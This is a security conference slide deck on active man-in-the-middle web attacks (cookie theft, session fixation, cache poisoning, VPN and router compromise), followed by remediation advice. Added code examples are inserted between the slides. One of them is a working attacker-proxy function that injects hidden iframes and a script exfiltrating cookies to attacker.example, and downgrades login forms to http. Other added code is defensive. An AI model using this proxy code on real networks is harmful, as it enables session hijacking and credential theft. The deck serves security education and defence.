Page 1

IBM Rational Application Security Group (aka Watchfire)

Web Based Man In the Middle Attack © 2009 IBM Corporation

Active Man in the Middle Attacks

The OWASP Foundation

OWASP

http://www.owasp.org

27/02/2009

Adi Sharabani

Security Research Group Manager, IBM Rational Application Security (a.k.a. Watchfire)

adish

Page 2

Agenda

Background
– Man in the Middle
– Network level – heavily researched
– Web application level – sporadic research

Outline
– Passive MitM attacks
– Active MitM attacks
– Penetrating an internal network
– Remediation

Page 3

Man in the Middle Scenario

All laptop users connect to a public network

Wireless connection can easily be compromised or impersonated

Wired connections might also be compromised


Page 4

Rules of Thumb – Don’ts …

Someone might be listening to the requests
– Don’t browse sensitive sites
– Don’t supply sensitive information

Someone might be altering the responses
– Don’t trust any information given on web sites
– Don’t execute downloaded code

Page 5

Rules of Thumb – What Can You Do?

This leaves us with:

– Browse your favorite news site

– Browse your favorite weather site

(Diagram: non-sensitive sites – “boring”; sensitive sites – “interesting”)

Page 6

You are still vulnerable

Page 7

Mitigating a Fallacy

Fallacy
– Executing JavaScript on victim == executing an attack

Reality
– Same origin policy
– Executing an attack requires either
  – JavaScript + browser implementation bug, or
  – JavaScript + execution on a specific domain
    – Can be done through XSS

Page 8

Passive Man in the Middle Attacks

1. Victim browses to a website
2. Attacker views the request, manipulates it and forwards it to the server
3. Server returns a response
4. Attacker views the response, manipulates it and forwards it to the victim

Other servers are not affected

Page 9

Active Man in the Middle Attack

The attacker actively directs the victim to an “interesting” site

1. Victim browses to a “boring” site (e.g. My Weather Channel)
2. Attacker transfers the request to the server
3. Server returns a response
4. Attacker adds an IFRAME referencing an “interesting” site (e.g. My Bank Site); the IFRAME could be invisible
5. Automatic request is sent to the interesting server

Other servers are not affected


Page 11

Stealing Cookies*

Automatic request contains victim’s cookies

Obvious result
– Stealing cookies associated with any domain attacker desires
– Will also work for HTTP ONLY cookies (as opposed to XSS attacks): HttpOnly only hides a cookie from script, the browser still sends it in the clear with the automatic request, where the attacker reads it

* A similar attack was presented by Mike Perry – SideJacking

Page 12

Demo

Page 13

Overcoming Same Origin Policy

1. Victim surfs to a “boring” site
2. Attacker injects an IFRAME directing to an “interesting” site
3. Automatic request is sent to the interesting server
4. Attacker forwards the automatic request to the “interesting” server
5. “Interesting” server returns a response
6. Attacker adds a malicious script to the response
7. Script executes with the “interesting” server’s restrictions (i.e. in the “interesting” site’s origin)

Result
– Attacker can execute scripts on any domain she desires
– Scripts can fully interact with any “interesting” website

Limitations
– Will only work for non SSL web sites

Page 14

Secure Connections

Login Mechanism

Page 15

Secure Connections – Login Mechanism

1. Victim browses to site http://www.webmail.site
2. Site returns a response with a login form (Username / Password / SUBMIT)
3. Victim fills in login details (jsmith / ********) and submits the form
4. Login request is sent through a secure channel
5. Login successful: “Hello John Smith,”

The pre-login page is sent in clear text. The attacker could alter the pre-login response (e.g. change the form’s https:// action to http://) so that the login request itself is sent unencrypted.
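The proxy-side logic behind slides 9, 13 and 15, as an added example that is not part of the original talk: a Python function an attacker's HTTP proxy would apply to each plain-HTTP response before forwarding it to the victim. The hosts bank.example (the “interesting” site), attacker.example (the collection point) and weather.example, and the sample pages in the comments, are constructed for the example; the function assumes the proxy has already decompressed the body and passes compressed bodies through untouched.

```python
"""Attacker-side response rewriting for an active MitM (added example)."""
import re
from typing import Dict, Tuple

TARGET_HOST = "bank.example"        # the "interesting" site (assumed name)
ATTACKER_HOST = "attacker.example"  # where stolen data is sent (assumed name)

# Invisible IFRAME injected into any "boring" page (slide 9): the browser then
# sends an automatic request, cookies included, to the "interesting" site.
HIDDEN_IFRAME = (
    f'<iframe src="http://{TARGET_HOST}/" '
    'style="width:0;height:0;border:0;visibility:hidden"></iframe>'
)

# Script injected into the "interesting" site's own response (slide 13). It runs
# in that site's origin, so the same origin policy does not stand in the way.
INJECTED_SCRIPT = (
    f'<script>new Image().src="http://{ATTACKER_HOST}/c?"'
    '+encodeURIComponent(document.cookie);</script>'
)

_BODY_END = re.compile(r"</body\s*>", re.IGNORECASE)
# slide 15: a form on a cleartext page that posts to https gets downgraded
_HTTPS_FORM_ACTION = re.compile(r'(<form\b[^>]*\baction=["\']?)https://', re.IGNORECASE)


def _inject(html: str, snippet: str) -> str:
    """Place snippet just before </body>, or append it if the page has none."""
    m = _BODY_END.search(html)
    if m is None:
        return html + snippet
    return html[:m.start()] + snippet + html[m.start():]


def rewrite_response(host: str, headers: Dict[str, str], body: bytes) -> Tuple[Dict[str, str], bytes]:
    """Return the (headers, body) the proxy forwards to the victim for a response from `host`."""
    lower = {k.lower(): v for k, v in headers.items()}
    if not lower.get("content-type", "").lower().startswith("text/html"):
        return headers, body          # images, scripts, etc. pass through untouched
    if "content-encoding" in lower:
        return headers, body          # compressed body: decode upstream first (not done here)
    html = body.decode("utf-8", errors="replace")
    if host.lower() == TARGET_HOST:
        html = _inject(html, INJECTED_SCRIPT)   # run in the "interesting" origin
    else:
        html = _inject(html, HIDDEN_IFRAME)     # drag the victim to the "interesting" site
    html = _HTTPS_FORM_ACTION.sub(r"\1http://", html)   # credentials now travel in the clear
    new_body = html.encode("utf-8")
    new_headers = {k: v for k, v in headers.items() if k.lower() != "content-length"}
    new_headers["Content-Length"] = str(len(new_body))  # body grew, keep framing valid
    return new_headers, new_body
```

On an untrusted network the same rewriting is what to look for when testing: an unexpected zero-size iframe in a page, or a login form whose action lost its https://. The payload also shows the HttpOnly point of slide 11 from the other side: the script running in the bank origin only reads cookies that script is allowed to read, but the automatic iframe request that crossed the proxy already carried all of them.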

Page 16

Stealing Auto Completion Information

1. Attacker redirects the victim to a pre-login page
2. Attacker returns the original login form together with a malicious script
3. Script accesses the auto-completion information using the DOM

* A passive version of this attack was described by RSnake in his blog

Result
– Attacker can steal any auto-completion information she desires

Limitations
– Will only work for pre-login pages that are not encrypted
– Will not work seamlessly in IE

Page 17

Demo

Page 18

Broadening the Attack (Time Dimension)

Page 19

(Diagram: the time dimension)
– Passive MitM attacks: Present (“boring” sites)
– Active MitM attacks: Past (“interesting” sites), Present (“boring” sites), Future (“interesting” sites)

Page 20

Session Fixation

1. Attacker redirects the victim to the site of interest
2. Attacker returns a page with a cookie generated by the server
3. Cookie is saved on the victim’s computer
4. A while later, the victim connects to the site (with the pre-provided cookie) and logs in
5. Attacker uses the same cookie to connect to the server
6. Server authenticates the attacker as the victim

Result
– Attacker can set persistent cookies on the victim

Limitations
– The vulnerability also lies within the server: it must keep accepting the session identifier it handed out before authentication instead of issuing a new one at login
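Whether the planted cookie of slide 20 turns into an account takeover is decided by the server, which is the limitation the slide names. The following added example, not from the talk, models both server behaviours in Python with an in-memory session store: VulnerableSessions keeps whatever session id the browser presents and binds the login to it; HardenedSessions only honours ids it issued and, the part that matters, issues a fresh id at login so the id the attacker knows is never the authenticated one. fixation_attack replays the slide's sequence against either. Class names and the user name are constructed.

```python
"""Session fixation, server side (added example, not from the slides)."""
import secrets
from typing import Dict, Optional


class VulnerableSessions:
    """Adopts a client-presented id and binds the login to it: fixable."""

    def __init__(self) -> None:
        self.store: Dict[str, Optional[str]] = {}   # sid -> authenticated user or None

    def visit(self, cookie_sid: Optional[str]) -> str:
        # Any sid the browser carries is kept, including one the attacker
        # obtained from this server and planted via the MitM.
        if cookie_sid is not None:
            self.store.setdefault(cookie_sid, None)
            return cookie_sid
        sid = secrets.token_urlsafe(32)
        self.store[sid] = None
        return sid

    def login(self, sid: str, user: str) -> str:
        self.store[sid] = user          # same id, now authenticated
        return sid

    def whoami(self, sid: str) -> Optional[str]:
        return self.store.get(sid)


class HardenedSessions(VulnerableSessions):
    """Only honours ids it issued, and regenerates the id on authentication."""

    def visit(self, cookie_sid: Optional[str]) -> str:
        if cookie_sid is not None and cookie_sid in self.store:
            return cookie_sid          # issued by us, still anonymous: fine to keep
        sid = secrets.token_urlsafe(32)  # unknown id from the client is ignored
        self.store[sid] = None
        return sid

    def login(self, sid: str, user: str) -> str:
        # The pre-login id (possibly known to the attacker) is retired; the
        # authenticated session lives under a fresh id only the victim sees.
        self.store.pop(sid, None)
        new_sid = secrets.token_urlsafe(32)
        self.store[new_sid] = user
        return new_sid


def fixation_attack(server: VulnerableSessions) -> Optional[str]:
    """Replay slide 20 and return who the server takes the attacker for."""
    planted = server.visit(None)              # attacker fetches a server-issued id
    victim_sid = server.visit(planted)        # MitM plants it in the victim's browser
    server.login(victim_sid, "victim")        # a while later the victim logs in
    return server.whoami(planted)             # attacker presents the planted id
```

The MitM side of the attack does not change between the two servers; only the regeneration at login decides whether the replay in the last line authenticates the attacker.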

Page 21

Cache Poisoning

1. Attacker redirects the victim to the site of interest
2. Attacker returns a malicious page with cache settings enabled
3. Page is cached on the victim’s computer
4. A while later, the victim visits the site and the poisoned page is served from the cache

Result
– Attacker can poison any page she desires
– Poisoned pages will be persistent

Limitations
– Attacker can only poison non SSL resources
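How long the poisoned page of slide 21 (and the poisoned internal pages of slides 27 and 29) keeps being served follows from the freshness rules browser caches implement (RFC 7234, section 4.2). This added example, not part of the talk, computes a response's freshness lifetime from its headers so the attacker's headers can be compared with what a site should send. The three header sets are constructed: the first is what an attacker would return, the second what a page that must never be reused from cache should carry, the third a page with no explicit freshness, for which browsers fall back to a heuristic from Last-Modified.

```python
"""Freshness lifetime of an HTTP response (added example)."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
from typing import Dict, Optional


def _http_date(value: str) -> Optional[datetime]:
    """Parse an HTTP-date; None if unparseable (the cache treats it as expired)."""
    try:
        dt = parsedate_to_datetime(value)
    except (TypeError, ValueError, IndexError):
        return None
    if dt.tzinfo is None:             # "-0000" yields a naive datetime; pin to UTC
        dt = dt.replace(tzinfo=timezone.utc)
    return dt


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'public, max-age=10' -> {'public': None, 'max-age': '10'}."""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip()
        if part:
            name, _, arg = part.partition("=")
            directives[name.lower()] = arg.strip().strip('"') or None
    return directives


def freshness_lifetime(headers: Dict[str, str], now: datetime) -> float:
    """Seconds the response may be served from cache without revalidation (0 = none)."""
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    if "no-store" in cc or "no-cache" in cc:
        return 0.0
    if cc.get("max-age") is not None:          # max-age wins over Expires
        try:
            return max(0.0, float(cc["max-age"]))
        except ValueError:
            return 0.0
    date = _http_date(h["date"]) if "date" in h else None
    if date is None:
        date = now                               # no usable Date: cache uses receipt time
    if "expires" in h:
        expires = _http_date(h["expires"])
        if expires is None:
            return 0.0                           # e.g. "Expires: 0" means already stale
        return max(0.0, (expires - date).total_seconds())
    if "last-modified" in h:
        lm = _http_date(h["last-modified"])
        if lm is None:
            return 0.0
        return max(0.0, (date - lm).total_seconds() / 10.0)   # common 10 % heuristic
    return 0.0


NOW = datetime(2009, 2, 27, 10, 0, tzinfo=timezone.utc)

# Constructed: what the attacker returns for the poisoned page (fresh for 10 years).
POISONED = {
    "Date": "Fri, 27 Feb 2009 10:00:00 GMT",
    "Cache-Control": "public, max-age=315360000",
    "Expires": "Sun, 24 Feb 2019 10:00:00 GMT",
    "Content-Type": "text/html",
}
# Constructed: what a page that must not be reused from cache should send.
HARDENED = {"Date": "Fri, 27 Feb 2009 10:00:00 GMT", "Cache-Control": "no-store", "Content-Type": "text/html"}
# Constructed: no explicit freshness, so the heuristic applies (10 days old -> 1 day).
HEURISTIC = {"Date": "Fri, 27 Feb 2009 10:00:00 GMT", "Last-Modified": "Tue, 17 Feb 2009 10:00:00 GMT", "Content-Type": "text/html"}
```

The attacker only needs the victim's browser to see the poisoned response once; after that the hot-spot is irrelevant and the page is replayed from disk until the freshness lifetime runs out or the user clears the cache, which is the persistence the slide refers to. A site cannot prevent the poisoning of a plain-HTTP resource, but sending no-store on sensitive pages means a poisoned copy is at least not stored.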

Page 22

Demo

Page 23

Complex Hacking: Virtual Private Networks

Page 24

Virtual Private Networks (VPN)

VPN client initialization
– Create a secure network interface
– Set user’s routing table

VPN client finalization (upon exit or when connection is lost)
– Revert routing table

Do not confuse VPN and HTTPS architectures!

Page 25

VPN Mixed content

Internal Web Site:
<html><script src=http://external/sc.js>...</html>

1. Victim surfs to a page in the VPN network
2. Attacker alters the non-encrypted script (it is fetched from the external site over plain HTTP, outside the VPN tunnel)
3. Malicious script executes within the secure environment

Result
– VPN web sites are compromised
– User is not alerted to the security risk (as opposed to SSL mixed content issues)

Limitations
– Such mixed content is not widely used

Page 26

Hacking Non-Available Sites

Result
– Attacker can view and change any HTTP cache object
– Even for non available sites

Page 27

VPN Cache Injection

1. Attacker disconnects the connection to the VPN server
2. After the routing table is updated (reverted by the VPN client), the attacker poisons the cache of an internal site
3. Attacker recovers the connection
4. Attacker redirects the victim to the cached resource
5. Cached resource loads and the malicious cached script executes

Result
– VPN is great for the network level
– VPN is not enough for the application level
– This attack could be applied to other application protocols!

Page 28

Complex Hacking: Intranet Networks

Page 29

Penetrating Internal Network – Simple Cache Poison

Result
– Attack will be launched every time the victim accesses the resource
– The attack is executed within the local intranet

Characteristics
– Firewall protections are helpless
– Affected servers will never know
– The attack is persistent

Page 30

Setting Up a Future MitM Scenario

1. Using active MitM techniques, the attacker poisons the victim’s cache related to his router’s web access
2. Victim’s router related cache is poisoned with a malicious script
3. Malicious script executes when the victim tries to access the router
4. Script configures the router to tunnel future communication through the attacker (e.g. Outbound Proxy IP Address and Primary DNS Server Address set to 216.187.118.221)
5. Script hides the configuration changes

Result
– Facilitates future MitM scenarios
– Does not require router’s credentials
– Fake settings could be displayed to the user

Limitations
– Requires victim to access router in the future
– Need to guess router’s address (10.0.1.1)

Page 31

Increasing the Exposure

Poison common home pages
– Script will execute every time the victim opens his browser

Poison common scripts
– Script will execute on every page using the common script
– Example: http://www.google-analytics.com/ga.js

The “double active” attack
– Common poisoned page redirects to another poisoned resource

Page 32

The Double Active Cache Poisoning Attack

1. Using active MitM techniques, the attacker poisons the common router’s address (i.e. 10.0.1.1)
2. Attacker also poisons common home pages
3. At a later time, the victim opens the browser
4. Cached home page is loaded and redirects the victim’s browser to the router’s web interface
5. Cached router web interface is loaded and the malicious script changes the router’s settings
6. Router is compromised by the malicious script

Result
– Internal network has been compromised

Limitation
– Need to guess router IP and credentials

Page 33

Active Attack Characteristics

– Not noticeable in user’s experience
– Not noticeable by any of the web sites
– IPS/IDS will not block it
– Can be persistent
– Can be used to hack into the local organization
– Bypasses any firewall or VPN
– Can be used with DNS Pinning techniques
– A problem with the current design
– Requires only one plain HTTP request to be transmitted

Page 34

Remediation

Users
– Do not use auto-completion
– “Clean Slate Policy”
– Trust level separation
  – Two different browsers
  – Two different users
  – Two different OS
  – Virtualization products
– Tunnel communication through a secure proxy
  – Might not be allowed in many hot-spots

Page 35

Web owners
– Consider risks of partial SSL sites
– Do not consider a secure VPN connection an SSL replacement
– Use random tokens for common scripts
  – While considering performance issues
– Avoid referring to external scripts from internal sites
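The internal page on slide 25 that loads http://external/sc.js, and the advice above to avoid external script references from internal sites, suggest a check worth running over intranet pages. The following Python scanner is an added example, not from the talk: it parses a page, resolves every script, iframe, object, embed and stylesheet reference against the page URL, and flags those served from outside an assumed internal DNS zone (.corp.example) or fetched over plain http, the second case because a VPN tunnel is not an SSL replacement (slide 27). The zone, the page URL and the sample page are constructed.

```python
"""Flag cross-trust and cleartext resource references in an internal page (added example)."""
from html.parser import HTMLParser
from typing import Dict, List, Tuple
from urllib.parse import urljoin, urlsplit

INTERNAL_SUFFIXES = (".corp.example",)   # assumed internal DNS zone

# Elements whose referenced resource is executed or interpreted in the page's origin.
ACTIVE_REFS = {"script": "src", "iframe": "src", "object": "data", "embed": "src"}


class _RefCollector(HTMLParser):
    """Collects (tag, absolute URL) for active content and stylesheets."""

    def __init__(self, base_url: str) -> None:
        super().__init__()
        self.base_url = base_url
        self.refs: List[Tuple[str, str]] = []

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        a = {k.lower(): (v or "") for k, v in attrs}   # valueless attrs come back as None
        if tag in ACTIVE_REFS and a.get(ACTIVE_REFS[tag]):
            self.refs.append((tag, urljoin(self.base_url, a[ACTIVE_REFS[tag]])))
        elif tag == "link" and "stylesheet" in a.get("rel", "").lower().split() and a.get("href"):
            self.refs.append((tag, urljoin(self.base_url, a["href"])))


def is_internal_host(host: str) -> bool:
    return host.lower().endswith(INTERNAL_SUFFIXES)


def find_mixed_trust(page_url: str, html: str) -> List[Dict[str, str]]:
    """Return references that leave the internal zone or travel over cleartext http."""
    collector = _RefCollector(page_url)
    collector.feed(html)
    collector.close()
    findings: List[Dict[str, str]] = []
    for tag, url in collector.refs:
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https"):
            continue                      # data:, javascript: etc. are not fetched from a host
        reasons = []
        if not is_internal_host(parts.hostname or ""):
            reasons.append("external host")          # the slide 25 case
        if parts.scheme == "http":
            reasons.append("cleartext http")         # poisonable on the wire (slides 21, 27)
        if reasons:
            findings.append({"tag": tag, "url": url, "reason": ", ".join(reasons)})
    return findings


# Constructed sample: an intranet page mixing local resources with the slide's external script.
SAMPLE_PAGE_URL = "https://intranet.corp.example/home"
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="/css/site.css">
<link rel="stylesheet" href="https://cdn.example/theme.css">
<script src="/js/app.js"></script>
<script src=http://external/sc.js></script>
</head><body><img src="http://images.example/logo.png"></body></html>"""
```

Images are deliberately left out: a swapped image is a nuisance, a swapped script runs in the internal origin, which is the point of slide 25. Run the scanner over saved copies of intranet pages and treat any "external host" hit on a script tag as the finding to fix first.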

Page 36

Industry
– Build an integrity mechanism for HTTP
– Secure WiFi networks

Page 37

Summary

Active MitM attacks
– Broaden the scope of the passive attacks
– Design issues
– Dimension of time
  – Past (steal cookies, auto-completion information, cache)
  – Future (set up cookies, poison cache, poison form filler)
– Penetrating internal networks
– Persistent
– Bypass any current protection mechanisms

More information
– Paper and presentation will be uploaded to our blog: http://blog.watchfire.com

Page 38

References

– Watchfire’s Blog: http://blog.watchfire.com
– Wireless Man in the Middle Attacks: http://www.informit.com/articles/article.aspx?p=353735&seqNum=7
– SideJacking: http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html
– More on SideJacking: http://erratasec.blogspot.com/2008/01/more-sidejacking.html
– Active SideJacking: http://seclists.org/bugtraq/2007/Aug/0070.html
– Surf Jacking: http://resources.enablesecurity.com/resources/Surf%20Jacking.pdf
– Stealing User Information: http://ha.ckers.org/blog/20060821/stealing-user-information-via-automatic-form-filling/

Page 39

Thank you!

